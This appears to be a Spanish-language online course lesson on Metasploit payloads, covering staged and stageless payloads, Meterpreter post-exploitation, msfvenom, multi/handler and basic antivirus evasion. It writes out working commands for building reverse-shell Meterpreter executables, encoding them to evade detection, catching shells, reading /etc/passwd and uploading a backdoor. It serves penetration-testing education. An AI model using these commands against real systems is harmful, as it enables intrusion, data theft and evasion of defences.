Payloads: con etapas y sin etapas, Meterpreter
Elija el payload adecuado para cada situación y utilice Meterpreter durante la postexplotación.
Payloads: con etapas y sin etapas, Meterpreter es una lección gratuita de Cyber Security Academy en CoddyKit. Esta es la lección 3 de 4. Puedes leer la lección completa abajo gratuitamente — luego la practicas en el navegador con un editor de código integrado y un tutor de IA 24/7. Forma parte de la ruta de aprendizaje de Cyber Security Academy, y tu progreso se sincroniza en la web y la app de CoddyKit. El curso de Cyber Security Academy incluye 4 lecciones en total.
¿Qué es un payload?
Un payload es el código que se ejecuta en el objetivo después de que un exploit se ejecuta correctamente. Define lo que obtiene el atacante: una shell, ejecución de comandos, acceso a archivos o un agente completo como Meterpreter.
Payloads staged y stageless
Los payloads Stageless (/) contienen todo en un único binario: son más grandes, pero más sencillos, y no necesitan una conexión de red posterior a la entrega inicial. Los payloads Staged (//) envían primero un stager pequeño que descarga la segunda etapa desde el handler.
# Stageless (single slash naming):
windows/x64/shell_reverse_tcp
# Staged (double slash naming):
windows/x64/shell/reverse_tcp
# ^
# stage 2 downloaded after stager connectsCuándo utilizar cada uno
Utilice stageless cuando el objetivo no tenga acceso a Internet o al handler después del exploit inicial: el payload debe ser autónomo. Utilice staged cuando desee un payload inicial más pequeño y disponga de una conexión fiable con el handler.
Descripción general de Meterpreter
Meterpreter es el payload avanzado de Metasploit: se ejecuta completamente en memoria, utiliza comunicaciones cifradas y proporciona una API completa con acceso al sistema de archivos, migración de procesos, registro de pulsaciones de teclas, captura de pantalla y pivotaje.
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.10
msf6 > set LPORT 4444
msf6 > runComandos de Meterpreter
Comandos esenciales de Meterpreter para la pos-explotación: información del sistema, lista de procesos, operaciones con archivos y funciones de red.
meterpreter > sysinfo # system information
meterpreter > getuid # current user
meterpreter > ps # process list
meterpreter > download /etc/passwd
meterpreter > upload backdoor.sh /tmp/
meterpreter > shell # drop to OS shellMigración de procesos
Migre el proceso de Meterpreter a un proceso más estable o menos sospechoso, como explorer.exe en Windows. Esto también puede elevar los privilegios si se realiza la migración a un proceso con más privilegios.
meterpreter > ps
meterpreter > migrate 1234 # migrate to PID 1234
# Migrate to explorer.exe for stability
# Avoids termination if original process exitsGeneración de payloads con msfvenom
msfvenom genera archivos de payload independientes (EXE, ELF, APK y shellcode) para su entrega mediante phishing, dispositivos USB abandonados o web shells en pruebas autorizadas.
# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-f exe -o payload.exe
# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-f elf -o payload.elfMulti/Handler para capturar shells
El módulo auxiliar multi/handler captura conexiones de reverse shell. Configúrelo con el mismo payload, LHOST y LPORT que utilizó en msfvenom antes de entregar el payload.
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 0.0.0.0
msf6 > set LPORT 4444
msf6 > run -j # run as background jobConceptos básicos de codificación y evasión
Los encoders de msfvenom pueden ofuscar los payloads para evadir la detección básica de los antivirus basada en firmas. Nota: los EDR modernos utilizan detección basada en el comportamiento; los encoders por sí solos no son suficientes contra defensas avanzadas.
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-e x64/xor_dynamic -i 5 \
-f exe -o encoded_payload.exePayloads bind y reverse
Los payloads reverse se conectan desde el objetivo al atacante, lo que resulta más adecuado para NAT y firewalls. Los payloads bind escuchan en el objetivo y el atacante se conecta a ellos. En la mayoría de los escenarios se prefiere reverse.
Detección de payloads por parte de los defensores
Los defensores detectan Meterpreter mediante firmas de red (patrones de tráfico de C2), análisis de memoria (artefactos de inyección reflectiva de DLL) y análisis de comportamiento (process hollowing y relaciones inusuales entre procesos padre e hijo).
Comprobación rápida
¿Qué diferencia a un payload staged de uno stageless en Metasploit?
Resumen: Payloads y Meterpreter
Elija payloads staged para obtener una huella inicial pequeña y stageless para una entrega autónoma. Meterpreter es el payload más capaz para la pos-explotación: se ejecuta en memoria, utiliza cifrado y es extensible. Utilice msfvenom para generar binarios independientes y configure siempre multi/handler para capturar las conexiones de retorno.
Preguntas frecuentes
¿La lección «Payloads: con etapas y sin etapas, Meterpreter» es gratis?
Sí — el texto completo de «Payloads: con etapas y sin etapas, Meterpreter» es gratis para leer aquí en la web. Para practicarla de forma interactiva (editor de código integrado y tutor de IA 24/7) y desbloquear el resto del curso de Cyber Security Academy, actualiza a CoddyKit PRO. El curso de Cyber Security Academy incluye 4 lecciones en total.
¿Qué aprenderé en «Payloads: con etapas y sin etapas, Meterpreter»?
Elija el payload adecuado para cada situación y utilice Meterpreter durante la postexplotación. Practicas Cyber Security Academy con código real que ejecutas directamente en el navegador, y un tutor de IA 24/7 responde tus preguntas mientras trabajas en la lección.
¿Necesito experiencia previa para empezar Cyber Security Academy?
No se requiere experiencia previa. Cyber Security Academy en CoddyKit está estructurado para principiantes hasta estudiantes avanzados, así que puedes empezar aquí o desde el inicio y avanzar a tu ritmo. Esta es la lección 3 de 4.
¿Cuánto tiempo toma la lección «Payloads: con etapas y sin etapas, Meterpreter»?
La mayoría de las lecciones de CoddyKit toman alrededor de 5–10 minutos. Cada una es compacta e interactiva, así que avanzas constantemente y retomas exactamente por donde dejaste en la web y la app.
¿Puedo escribir y ejecutar código en esta lección de Cyber Security Academy?
Sí. Cada lección de Cyber Security Academy incluye un editor de código integrado, así que escribes y ejecutas código real directamente en tu navegador y obtienes retroalimentación instantánea de IA — sin configuración local necesaria.
Todas las lecciones de este curso
- Arquitectura de Metasploit y msfconsole
- Explotación de una vulnerabilidad conocida
- Payloads: con etapas y sin etapas, Meterpreter
- Postexplotación: pivotar y persistir